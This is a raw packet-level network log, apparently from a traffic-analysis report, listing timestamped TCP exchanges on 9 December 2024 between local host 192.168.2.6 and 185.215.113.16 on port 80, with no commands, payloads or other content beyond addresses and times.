                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.464999914 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.465042114 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.469188929 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.469230890 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.469300985 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.469346046 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.473604918 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.473648071 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.473656893 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.473692894 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.478208065 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.478261948 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.478311062 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.478353024 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.482530117 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.482574940 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.482597113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.482634068 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.486943960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.486993074 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.487540960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.487581015 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.492161989 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.492202997 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.492321968 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.492363930 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.496078968 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.496119976 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.496267080 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.496304035 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.500643969 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.500691891 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.500998020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.501038074 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.504848957 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.504892111 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.505073071 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.505109072 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.586270094 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.586318970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.586541891 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.586591005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.588385105 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.588422060 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.588490009 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.588546038 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.592654943 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.592696905 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.613122940 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.613171101 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.613209009 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.613246918 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.614841938 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.614890099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.615118027 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.615155935 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.618244886 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.618302107 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.618458033 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.618514061 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.621624947 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.621867895 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.621917009 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.625061989 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.625406981 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.625451088 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.628499985 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.628667116 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.628948927 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.628997087 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.631812096 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.631895065 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.631941080 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.634845018 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.634964943 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.635021925 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.638062000 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.638413906 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.638474941 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.641163111 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.641218901 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.641356945 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.641437054 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.644279003 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.644481897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.644536972 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.647514105 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.647656918 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.647699118 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.650592089 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.650852919 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.650903940 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.653839111 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.653903008 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.653947115 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.653986931 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.656976938 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.657028913 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.657205105 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.657253981 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.660033941 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.660085917 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.660245895 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.660295963 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.663203955 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.663621902 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.663670063 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.666335106 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.666400909 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.666657925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.666707039 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.669703007 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.669912100 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.669930935 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.669971943 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.672671080 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.672714949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.673381090 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.675853014 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.675925970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.676434040 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.676511049 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.678993940 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.679219007 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.679295063 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.682203054 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.682749033 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.682823896 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.685302973 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.686017036 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.686096907 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.688494921 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.688579082 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.688764095 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.688839912 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.691668034 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.692167997 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.692240953 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.694772005 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.695030928 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.695105076 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.698041916 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.698345900 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.698429108 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.701072931 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.701153040 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.701226950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.701313019 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.704224110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.704499960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.704576969 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.707393885 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.707659006 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.707743883 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.710894108 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.711535931 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.711616993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.713812113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.713896036 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.714020014 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.714098930 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.716840029 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.717166901 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.717216015 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.779165983 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.779257059 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.779441118 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.780550003 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.780652046 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.780829906 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.780905962 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.783940077 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.784014940 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.784111977 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.784182072 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.786647081 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.786720037 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.786763906 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.786828995 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.789817095 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.789946079 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.790039062 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.790110111 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.804999113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.805224895 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.805310965 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.806246042 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.806318998 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.806385994 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.806454897 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.808717966 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.808790922 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.809017897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.809088945 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.811059952 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.811342001 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.811417103 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.813498020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.813535929 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.813570976 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.813652992 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.815857887 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.816399097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.816472054 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.818177938 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.818840027 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.818917036 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.820518017 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.820585966 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.820599079 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.820676088 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.822817087 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.822890043 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.823221922 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.823288918 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.825037956 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.825119972 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.825218916 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.825301886 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.827156067 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.827377081 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.827450037 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.829370975 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.829521894 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.829601049 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.831480980 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.831557035 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.831623077 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.831705093 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.833619118 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.833699942 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.833978891 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.834052086 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.835815907 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.835972071 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.836018085 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.837903976 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.838030100 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.838077068 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.839189053 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.839232922 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.839453936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.839628935 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.840454102 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.840497017 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.840996981 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.841754913 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.841806889 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.841876984 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.841933966 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.842983007 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.843030930 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.843379974 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.843427896 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.844304085 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.844345093 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.844513893 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.844557047 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.845617056 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.845663071 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.846203089 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.846246958 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.846967936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.847109079 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.847156048 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.848834038 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.848906994 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.849292994 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.849335909 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.849587917 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.849637032 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.849675894 CET8049923185.215.113.16192.168.2.6
